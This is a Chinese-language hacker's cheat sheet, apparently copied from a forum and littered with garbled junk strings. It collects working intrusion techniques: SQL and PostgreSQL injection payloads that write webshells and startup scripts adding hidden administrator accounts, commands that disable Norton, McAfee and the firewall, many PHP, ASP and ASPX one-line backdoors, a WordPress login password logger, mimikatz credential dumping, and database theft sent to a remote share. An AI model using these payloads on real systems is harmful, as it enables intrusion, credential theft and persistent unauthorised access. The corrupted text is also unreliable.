insert into a values ("set wshshell=createobject (""wscript.shell"") " );# s$ \( B3 A* A2 a8 b
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );% q/ h0 M, [( b: E7 a
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );; Y6 j$ D( G v: C5 K( ^
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
" T7 ?' l" \9 J% ~drop table a;
+ i8 j' U% z* \: [9 z$ A. C# q. F3 q7 W" v* `
英文版本:
- E( l! t1 a- [; ?/ B2 S( O3 O4 E4 }5 j' |/ P+ u* x
use test;6 e6 k" v/ a D u
create table a (cmd text);
4 Z; D; v/ N/ u8 D7 A g' ]insert into a values ("set wshshell=createobject (""wscript.shell"") " );
" s% P8 P" O* K1 o; |insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
, a0 [: ]5 L. Z5 q( \. y2 Vinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 {; b) l1 ?+ }
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
( i- i2 S. w L4 n1 t- _ rdrop table a;
* I; `' m5 Y# }3 g1 Y
! \8 e$ y$ G* W3 b* E9 _& A6 ccreate table a (cmd BLOB);
3 }) b. \7 {( x% `# ainsert into a values (CONVERT(木马的16进制代码,CHAR));
# j4 D& z; }2 o Q( ^, P0 |select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'0 O$ @, Z& V- E- ?7 |( A% z& ]
drop table a;
8 s2 _4 b) p' d* e: J4 N# k1 Z' d
% X% M, Y+ L! T* s记录一下怎么处理变态诺顿" r0 h2 O# d9 T9 j h8 U! q s# e
查看诺顿服务的路径0 X* L6 U4 M+ K y) C7 J
sc qc ccSetMgr; v# m) h2 x/ M* C! V4 K; l: ]6 h
然后设置权限拒绝访问。做绝一点。。; v# J" |& L. t4 P8 ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
5 z9 T; B8 _5 n0 jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
. Z+ X$ {5 R3 ]( jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
$ X8 V' M7 P) H) ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone }( G4 ~, Z0 f- K
( i. V3 H8 C' \然后再重启服务器
% M% I! x f1 [6 L; O2 ~iisreset /reboot
4 d. K% S' z3 D这样就搞定了。。不过完事后。记得恢复权限。。。。
$ y0 B+ \0 c. G! }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F; o# h( T( I' B" h2 w2 Z n( _7 K1 n4 S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
4 e# v- i0 g2 scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
9 N6 b- E' o1 k3 H3 Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F; d8 ?8 f, b( u: J8 Y" K+ `0 o
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin. s, q# J5 P7 z) g* A! \0 H
+ W# n9 ?9 G7 Y; t
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
" u, ^' W1 [0 R2 x. Y
' b+ G) n0 U7 e. C3 `8 v1 Y3 Qpostgresql注射的一些东西
% @5 `: e( [: b6 S( |% N# r" ?2 {如何获得webshell9 q: ?8 C$ o* ^6 G
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); " B$ t5 D2 h" w8 {: T
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); " S5 p( s) H+ h0 P7 a* S6 l% g
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
; d+ m, p1 Y% b1 G/ e2 R如何读文件/ I8 }- i0 t$ T& j! Y2 V! Q
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);0 x$ n$ U6 t, L* b' d
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
8 U7 D, x2 h: N$ s% w6 Hhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;- N$ P3 M; X9 @
2 `. W' t" Q# A7 b' l
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。* | x' a/ {6 B- `" j
当然,这些的postgresql的数据库版本必须大于8.X- J2 w2 X( Z# T2 o, Q8 Q
创建一个system的函数:, @0 ?. e( C4 f& b
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT5 E5 e( h1 I: l- j/ ~7 V
% ]1 o: V! } s( ?' C创建一个输出表:
' m0 U' y( g+ E- u2 FCREATE TABLE stdout(id serial, system_out text)
5 |+ a9 n; _* {+ v1 M7 W6 J
, k( i7 k" M5 ?2 Q3 y执行shell,输出到输出表内:
3 @, D3 e- i* s1 \SELECT system('uname -a > /tmp/test')/ @2 z2 U. @8 a0 K4 N2 t' r
/ F, U" X0 f8 S- Lcopy 输出的内容到表里面;2 N, n3 |9 T! j$ C* Q7 n `4 H
COPY stdout(system_out) FROM '/tmp/test'( q0 ^, w6 M) ~0 o* x$ H
' X. T( } O" j$ O5 Q: g从输出表内读取执行后的回显,判断是否执行成功& u$ ^" |5 F2 B( q( ?3 ~: `
& s2 H: n' x% B( e3 |6 g
SELECT system_out FROM stdout
6 X9 c% Y- a, Q下面是测试例子
. K' h$ O- C+ ]: P6 ^7 f8 [; n% p) U
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
& `, q+ f# P3 O4 I9 V' R# w" x( R& H; H6 y5 m' B; t
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
1 p- O, q& E5 b& _: KSTRICT --' z0 b2 m. F4 k4 n4 { r5 [
8 r! }; @' Z! m c/ k- T( j7 Q/store.php?id=1; SELECT system('uname -a > /tmp/test') --3 v! x" w( r4 O, Q
) [8 f$ \0 B4 U. Q/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --+ y( v7 k7 X, E' H$ \ r3 t, n
4 j9 a& Z' j! ]! R3 b
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
2 s' Y, ` ?' g/ D! e9 C9 Mnet stop sharedaccess stop the default firewall& i& P5 `$ u# e) L+ g
netsh firewall show show/config default firewall
% Y" `8 ?& `, q! ?; A4 C+ W( Bnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall& Q8 ]/ i0 P- I. b* Z$ @* o" U' I
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
) j3 Q4 b7 k' R. I, \" `修改3389端口方法(修改后不易被扫出)
, j8 o# r) C8 N+ J修改服务器端的端口设置,注册表有2个地方需要修改 _' S( I A' s
! g' m" |1 z/ W/ z- ^! N[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]+ j- v; X; o0 Q) b0 Y2 L8 d. y
PortNumber值,默认是3389,修改成所希望的端口,比如6000
# y# R6 \. _. T' y: P) V- v! ` @5 H
! f- E4 C% _) w) n d4 }0 K第二个地方:
8 B$ ?1 @- d( {7 ^[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
5 b' I2 ~3 o% [9 I( E4 V' ePortNumber值,默认是3389,修改成所希望的端口,比如6000
6 M3 Y/ y h/ ^- B# ^+ p4 B& z9 T/ j ~9 H1 f* P4 ?
现在这样就可以了。重启系统就可以了' t% [ f; A9 ^$ T
( V5 }; z& \8 i( c查看3389远程登录的脚本7 n- e- h Q8 m7 C: b4 w: o7 p
保存为一个bat文件
/ {/ D% X& C. d, L$ k6 [& q& Ldate /t >>D:\sec\TSlog\ts.log, b& q. Y) t) Z
time /t >>D:\sec\TSlog\ts.log
! I( S6 z( y% o: i0 ]/ @, Qnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log8 s, G0 F( s R' Z% T4 Z3 s$ _
start Explorer! a4 n9 y# ?# X( M; N. B
1 v% s7 D1 ^3 V7 |( c2 tmstsc的参数:
9 f* K7 E' V% G' }9 |& c$ W6 ^% K" |8 u3 `4 k& \5 B0 m2 f
远程桌面连接
9 d" D8 t: D7 w2 g
- S& G# F8 w4 c: Z8 H- v. i+ z# xMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]7 M8 X' E/ V3 d" _5 Q+ S
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?5 c3 r$ I/ _) y9 P" w: i/ w
# `* v9 X; `( T$ A* {- c" S
<Connection File> -- 指定连接的 .rdp 文件的名称。' J( t- z' J! x2 G3 f8 O) @1 D
8 f5 j3 `, A9 @/ u4 @! _
/v:<server[:port]> -- 指定要连接到的终端服务器。
" `; K1 D6 O, S4 ^( ], j; V% c! t, b) G2 l* v) `
/console -- 连接到服务器的控制台会话。
1 c3 C6 v8 }7 m6 L' _ E, A: \6 q& c& v* d/ H1 _) C
/f -- 以全屏模式启动客户端。5 }" p3 S6 a% l+ }
, D, ~" F, N+ ]6 U
/w:<width> -- 指定远程桌面屏幕的宽度。
" g: K! l! G* E: i
. |/ M& t* \2 i6 h/h:<height> -- 指定远程桌面屏幕的高度。0 i& l# H$ U/ W3 p3 b( ?
: N4 ^3 X; B5 s% K3 |: B/edit -- 打开指定的 .rdp 文件来编辑。/ U( L& z* u6 {* G
1 u5 q1 b: ~% E: b9 R
/migrate -- 将客户端连接管理器创建的旧版
) g/ ?( f# B/ P. h! l, }; x( t6 _连接文件迁移到新的 .rdp 连接文件。8 U, n4 d+ c& y/ M5 {
0 u& v3 F' e3 R9 ~/ _; h8 J, b" Z* N1 S- {. a3 i: Q3 ]0 l
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
) L) g. y: O, N* e+ v1 cmstsc /console /v:124.42.126.xxx 突破终端访问限制数量' D9 G9 U* C) A; l8 {5 c+ x+ ]) ~1 @
* \/ q6 i8 e5 k' `命令行下开启3389
; K- n- S6 s/ G7 X( P+ cnet user asp.net aspnet /add
) f# V9 B3 V2 z0 j+ @1 s7 U; Hnet localgroup Administrators asp.net /add
; ~4 ?% L, [. W9 f3 w! { i9 Ynet localgroup "Remote Desktop Users" asp.net /add
* C9 V% r2 p' e3 Mattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
) |4 Q$ Q* o! b6 M0 Recho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
4 O# r3 O$ m* y2 R) {echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
7 ~5 k5 J$ q3 z n; w: hecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
7 W. _5 D/ ^9 R* b5 Tsc config rasman start= auto7 L8 r$ E5 w3 ^7 b- Y* M: ]
sc config remoteaccess start= auto4 q" c5 S4 v0 L+ |6 `% B
net start rasman2 T4 y0 P% a5 ~/ F
net start remoteaccess+ u6 O% |. P5 [( V+ N: M" \
Media+ ^! o m/ @( Q4 v
<form id="frmUpload" enctype="multipart/form-data"
. }8 y+ E5 T! naction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
# b. M/ n1 h/ G* R9 W<input type="file" name="NewFile" size="50"><br>7 l1 w- u& L2 `* A; |& ~
<input id="btnUpload" type="submit" value="Upload">* C, f s) u! x& ?, A: ]3 h# v
</form>, [0 O, ]2 H4 x
& d( ?) r2 z! F5 M# V' {
control userpasswords2 查看用户的密码: Q0 u1 t4 `- A1 Y
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
8 o7 c, I$ V+ S }4 D- }SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
5 J/ G6 h3 Y! H1 n6 C$ ?$ p% k* Q m) [$ o6 f# d
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:; _. j, U: u/ G$ s- ^+ J2 @
测试1:
2 Y0 [& O- T* `2 a- i2 c% J5 |SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) H% q% F8 W# {* ~0 J% N9 A$ @
" N1 |5 ]0 G t: ^9 K测试2:
7 Z9 c! R9 s" l; E# P5 [7 Y4 U7 Y) Y, O6 c) _
create table dirs(paths varchar(100),paths1 varchar(100), id int)0 G" B( Z+ k$ X8 V9 X
+ ^6 \! H# W7 q/ `) o% m& C
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--+ \4 V4 i" ^; v0 g8 W5 I" m8 ^
: Y" e3 f; ^' L
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
( \4 y: y- R0 @+ I3 \关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令& j$ i) x2 d+ @! X% K+ r+ z; a2 h
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;. r7 T9 g/ `0 ?: e) u
net stop mcafeeframework
4 j8 n4 ]5 I8 W" O3 u- xnet stop mcshield; X/ K# [# z: }( G! D* F+ k
net stop mcafeeengineservice8 P; m9 u) l2 T0 R+ F+ I
net stop mctaskmanager
% V# t& z6 J8 p. G% j! Chttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
. A6 R% D1 d: Z9 q$ M& n! f4 o/ W0 ?9 q3 l, L7 w6 t) v7 F1 g
VNCDump.zip (4.76 KB, 下载次数: 1) : C4 n, o% R, v* e P
密码在线破解http://tools88.com/safe/vnc.php
8 w* H+ d% y( H6 P* h; X" S2 mVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取2 Q; \2 w9 z# P6 [
, e6 M2 M7 g' c( D# Fexec master..xp_cmdshell 'net user'
' t! q. Z+ X I+ l/ ]mssql执行命令。) n5 x" b: K% S/ l
获取mssql的密码hash查询
; g ]7 x" L3 w( G* I) X/ ?0 f5 Aselect name,password from master.dbo.sysxlogins# G" V& V- l+ l# r1 ~
6 m" X4 W3 g) Q- F) r4 s% |0 ibackup log dbName with NO_LOG;( c: K2 L2 b1 k q( R0 d
backup log dbName with TRUNCATE_ONLY;
5 Q! B' Y8 |. v, o% S3 D$ m" }DBCC SHRINKDATABASE(dbName);
' f0 ^! t, T4 {; l' ymssql数据库压缩
1 g+ j/ U9 `7 v5 h( C6 w3 W$ ?* a: t1 _
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK, u/ {' V5 q- k" n- C) S9 g+ O
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
7 K8 A, n& o/ {7 F8 |0 W0 q8 _, `/ d' H0 M# e% [& {
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
! w# v3 `! ?# o备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak' p) ^, `7 p; K+ t1 c
# n! E( h7 L% q7 e$ HDiscuz!nt35渗透要点: \' c) @9 B/ F
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
5 I1 g; k4 y& C(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>) |8 Z" g4 p6 `2 U% [
(3)保存。( ^! `2 d+ g+ o$ b
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
( s* a+ s4 l4 v: X& ^. ld:\rar.exe a -r d:\1.rar d:\website\: z- d5 X3 }2 G/ O% r
递归压缩website. R" I# r' X1 h: f
注意rar.exe的路径) f1 u: G& X3 v" i# ~1 _
. ?) Q$ R# B% c, L& M, P b( S6 ?<?php
8 b0 z5 G# m4 q# |8 D( Z) p+ [3 j! d/ u! G; b9 o& K6 x
$telok = "0${@eval($_POST[xxoo])}";
! _ u) t+ t" i) T2 b- @5 `
, v: d* Y$ V" K4 y+ p$ Y$username = "123456";
; M6 k& o# W( _; ^6 V" W0 U2 w4 t, l% U6 X3 J
$userpwd = "123456";
# f9 S; z0 O/ a+ y' O2 @
7 C B' X/ z# l$telhao = "123456";% A9 ^7 m$ Y! i
0 o6 X V3 W3 M. ?: J( f: ^
$telinfo = "123456";8 _. x4 S) I: I, v4 e2 z+ U% L
5 ]0 l R! d' C k d2 c
?>" r: B g+ g0 g' t
php一句话未过滤插入一句话木马0 w+ o! Y* c* }0 d2 B# A
; S1 C/ G0 W3 o站库分离脱裤技巧
; @9 A( E/ M' r# [* h2 Gexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"', D7 Y$ H; s; w# ~" z9 J" W; O
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'5 h. f' N% f+ w' j1 m; r) v
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
$ @. F. b7 ?% ~" _& h, p这儿利用的是马儿的专家模式(自己写代码)。
6 \4 E P1 f& k) B) s1 M+ Mini_set('display_errors', 1);, ~3 @5 f7 I. \; h
set_time_limit(0);
! f) g4 a; x' E3 c+ a( V, P7 a ierror_reporting(E_ALL);0 {3 N5 d& l1 N1 D8 s3 I( Y
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
9 x* J/ P( y" L% `- vmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());9 {3 s9 z: Y7 p5 {& f! i
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());: {1 Q, i2 n/ a4 y4 d7 k
$i = 0;
! v" S( O m& v1 m5 J$tmp = '';% t- M. j4 p( N* [4 o: O1 r
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
9 W9 ?1 a3 Q) c $i = $i+1;: {% j9 q. o$ j; I A
$tmp .= implode("::", $row)."\n";4 [: X* z3 T3 ?+ y
if(!($i%500)){//500条写入一个文件- R9 o' ^- S& Q. H
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
6 S& \2 a+ W0 b) V file_put_contents($filename,$tmp);
s4 C. ]! g, X# G4 B5 U% l3 N4 p $tmp = '';
* w; }- w T* W c* w }4 P4 m, G* x2 Z. X3 S7 g; U6 ]7 E
}* x& s! d) [) I$ N
mysql_free_result($result);" m' t! Y# T1 J7 V& R8 y% X+ _. n8 W
' d$ r, e( ~# D2 s) k1 W# _
" P: W0 a% M2 [# ~
+ M7 M' n9 A$ @& c8 F7 L& t9 N
//down完后delete
! {6 s: L) M' p( a6 Z k9 N7 t2 D+ n: h& C
. L& \+ V2 \# l% d! Z
ini_set('display_errors', 1);
# ?! x( n; o( N; }5 R/ M Verror_reporting(E_ALL);( @4 x* v6 K: G9 T! n
$i = 0;; D- z5 b L$ R* L8 t/ ]( F
while($i<32) {6 { V* D! V" S7 b. T$ ^! A
$i = $i+1;/ x: O9 q- E4 {! Z: B
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';, b% e* o! n2 c6 {0 O
unlink($filename);! V6 {$ r7 d- R H% k
} 9 ^8 C% m/ u6 W2 x9 E3 v6 R7 F
httprint 收集操作系统指纹
% Y& \/ N* `$ ]$ c, \( @( W扫描192.168.1.100的所有端口
1 ^2 ]7 m$ w- S$ g9 Rnmap –PN –sT –sV –p0-65535 192.168.1.1006 c+ ?. Z- a r
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
, D9 ~2 Y0 E. d1 a6 n) K& [host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
7 U! b+ j8 R- LNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host: R- B$ v$ q0 ]* u2 }0 m! @' X$ J
; ~# M( }5 E' ~) e2 e
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
0 b2 U/ S+ V( Y+ x9 M( j) U1 S# ? l% S8 v4 B
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)' e* G+ [4 C0 y
* h: e% _/ s: W2 b
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
) Y( I; w5 i' o# i3 U* {, t; ?# U( x; r% Y7 Y& a' k
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)- R7 C3 F/ n/ y' G) b% A* N
) Q, K; E6 B5 Y: L# m; x! p% G1 T4 O http://net-square.com/msnpawn/index.shtml (要求安装)
( u5 T8 M+ _" y( ?$ K4 h9 t/ i2 O. n$ Q" M. k0 ?5 W
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)% _1 \" s& b! n$ S( u& {/ U9 ^
6 g2 n) j0 C$ |0 N) M3 M SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
6 g1 J; _9 ~2 V/ Eset names gb2312
& h2 A5 i( y! h8 } r g导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
0 }' _+ U- m) [, `5 \
: q/ C. b4 [* c( ?mysql 密码修改( w, u K- T, d+ L9 B' @! D
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” - ^- b. ]0 p& @% Y( p
update user set password=PASSWORD('antian365.com') where user='root';+ t7 n- ~' T1 u- V6 e
flush privileges;
* g, n% Z. F/ {高级的PHP一句话木马后门
1 w1 j7 Y* B: b
: a. c1 u- s& K入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
4 P( _- M. Z" L3 M( N) R( j9 p& Y0 a# ^+ l6 O0 E# X! c
1、
1 U& m+ k/ J* _; }8 X6 C+ y$ f* H* p9 V& `4 {9 C8 B
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
- R; w# l0 \+ M6 m0 [ Y( S2 g" E5 J: b1 ~
$hh("/[discuz]/e",$_POST['h'],"Access");
* p8 u" O' M( C# Q8 F& E; n* ]
/ x9 U. g6 k1 |/ I6 K5 W5 l//菜刀一句话
9 q9 Q6 u9 n2 Z7 u
& F% V0 I$ [' D- j B% ?" N0 T$ Y( G2、
& H2 j# r. Q& d* ~ B8 C
# d# A& Z7 O: m$ O$filename=$_GET['xbid'];
: t1 Y2 C% p3 B# A% U$ S* U- y# ?' I m- {7 i; ?5 p
include ($filename);: K- Y3 m- `' `8 G* R
2 G, R% b2 {7 R# ^9 R9 K
//危险的include函数,直接编译任何文件为php格式运行# @) K8 p! Q, E, @
. U5 d8 K+ J e& f3 w0 X
3、1 H( r4 z9 s j6 f' \
' c; o- _- v7 L* u) i: I$reg="c"."o"."p"."y";; P; P3 y8 B! |! M1 O
( ?* c- X, ?5 o; C/ M8 J+ O/ N+ l+ {5 q$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
) v) M9 [" A" h& P! N3 w
: L% @; x: H9 Y0 j; g: f4 t//重命名任何文件6 n$ Z- Q o- j
1 R/ F. L0 `5 J J% i
4、
2 p* I/ K; q j- |# I! g( p
* Y% `3 r9 j7 {% E! l4 Z- c C$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";' R4 U4 G4 ?3 V! l. i* J
2 b- u# B' P2 E# t" E- d
$gzid("/[discuz]/e",$_POST['h'],"Access");/ m+ q7 H5 S1 w7 n! G! D: E& e
+ h6 k& V! `1 N. n7 @7 _
//菜刀一句话& U9 a2 K5 A! V: O; r' j
6 j4 e- c$ G0 C7 _
5、include ($uid);
1 M4 F/ g$ L/ }& ]. a: H& {% ]: c/ J0 t" n1 `2 S( ?
//危险的include函数,直接编译任何文件为php格式运行,POST
% w( a# q2 n X) H2 o3 R. L/ f# y1 n* a j
6 z8 y' r0 C4 ^% V$ v" J( k//gif插一句话
+ p" f& S/ M- F; p
& \; Y1 _ f6 s: ?& s6、典型一句话
8 z; a" a k+ _+ t7 f* d' d, l; z3 O ?4 _
程序后门代码2 j% K ^5 V- d/ _
<?php eval_r($_POST[sb])?>
0 }4 k. W% V- |# g% |* a程序代码7 g& L, ]; T- d! x
<?php @eval_r($_POST[sb])?>
1 B# d' m3 w6 v! P. S//容错代码
& A3 _7 n K2 p- Z程序代码, |5 v7 E w1 Q# y0 e, d$ Y
<?php assert($_POST[sb]);?>
! @) n& _$ _, t1 x0 F. M$ k' M# A//使用lanker一句话客户端的专家模式执行相关的php语句
+ J. f% ?* Y& d( U. b: _5 Y, O7 `程序代码
) c2 N7 r% Q* u; b7 H<?$_POST['sa']($_POST['sb']);?>
, \5 a4 h, Q4 ~程序代码 i$ N" Z3 D1 l: B$ q
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>6 }' \ O5 ]$ e. B9 @9 a! @/ Q
程序代码1 T/ V/ G$ o0 }
<?php
: @! y. B/ V- p% {2 q+ t: S@preg_replace("/[email]/e",$_POST['h'],"error");
# N* v9 n- ^8 Q% g?>
. l- ^8 T8 k) f: W' D5 v//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入$ o3 y/ @0 r- s* ^6 X1 N
程序代码# I T. a. |" m0 |! X/ n
<O>h=@eval_r($_POST[c]);</O>: b4 {7 C0 g+ c8 g
程序代码
+ a8 b+ d- G0 P0 P4 Q. i- l<script language="php">@eval_r($_POST[sb])</script> z/ O2 y+ e3 i
//绕过<?限制的一句话
" b. P+ K. D( U% b7 x6 w* P
, e, J) w( R) d7 shttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
" F+ B3 ^0 U# z& B( B- l详细用法:% l! |6 {# s* y* G
1、到tools目录。psexec \\127.0.0.1 cmd
& I' S& i, T8 g4 D2、执行mimikatz( x& x9 C7 Q( I% Q
3、执行 privilege::debug$ U9 W' H" Z3 V1 T& u2 C2 R, d- }3 T
4、执行 inject::process lsass.exe sekurlsa.dll6 X/ \) N2 N' O4 \5 ?9 S3 m
5、执行@getLogonPasswords
1 Q: V- w' z& H5 x: F1 N# F8 k2 O3 Q6、widget就是密码
& O6 q$ H& e/ C- |7、exit退出,不要直接关闭否则系统会崩溃。) N: e) A- n9 X% n8 y
! M) {* p) ?0 _6 ^1 {( I
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
( u; p- B7 F+ f8 W/ P- L" Y$ d0 w' i0 Y) _$ i) `3 P
自动查找系统高危补丁# {( g2 I' o7 r9 u- {" _ s& p* l2 u
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
6 d4 e# O- W* C% U6 Y$ ]- ~8 O; s1 q0 a- c2 P
突破安全狗的一句话aspx后门. n/ s" _ j) l, x
<%@ Page Language="C#" ValidateRequest="false" %>
/ ]& P/ q. s+ }. O; q) ^' y P2 G<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
" U0 f( s7 P5 e; `' W6 kwebshell下记录WordPress登陆密码& Q5 c' u6 m5 F n7 a
webshell下记录Wordpress登陆密码方便进一步社工
7 g; T) ]6 ?, W& D r& m9 ]- S在文件wp-login.php中539行处添加:# |. \0 }# E4 }& t3 E
// log password
9 o! i. z: \% H5 O! M$log_user=$_POST['log'];
0 V+ a8 j5 |3 L7 T9 B$log_pwd=$_POST['pwd'];
) J+ e* p: k7 S$ V6 {/ L$log_ip=$_SERVER["REMOTE_ADDR"];7 z# |% W, l3 P& G) b
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 T" C9 _1 G2 ~5 U: T/ B
$txt=$txt.”\r\n”;
" f& ?) M6 a8 F! Y/ Gif($log_user&&$log_pwd&&$log_ip){
, |4 n6 D4 j/ |4 ?@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
9 ?3 g& `" f( B' C}
. y' g( ^" U3 l* s当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。" W$ H6 ?; M0 f+ P `
就是搜索case ‘login’) I+ W6 W0 L7 r8 R t( s
在它下面直接插入即可,记录的密码生成在pwd.txt中,
- h( `" z6 x( ]其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
) i3 e! ?1 K) K6 W6 u1 B利用II6文件解析漏洞绕过安全狗代码:# n( |! o6 { O
;antian365.asp;antian365.jpg! V8 @* g1 D5 c) `
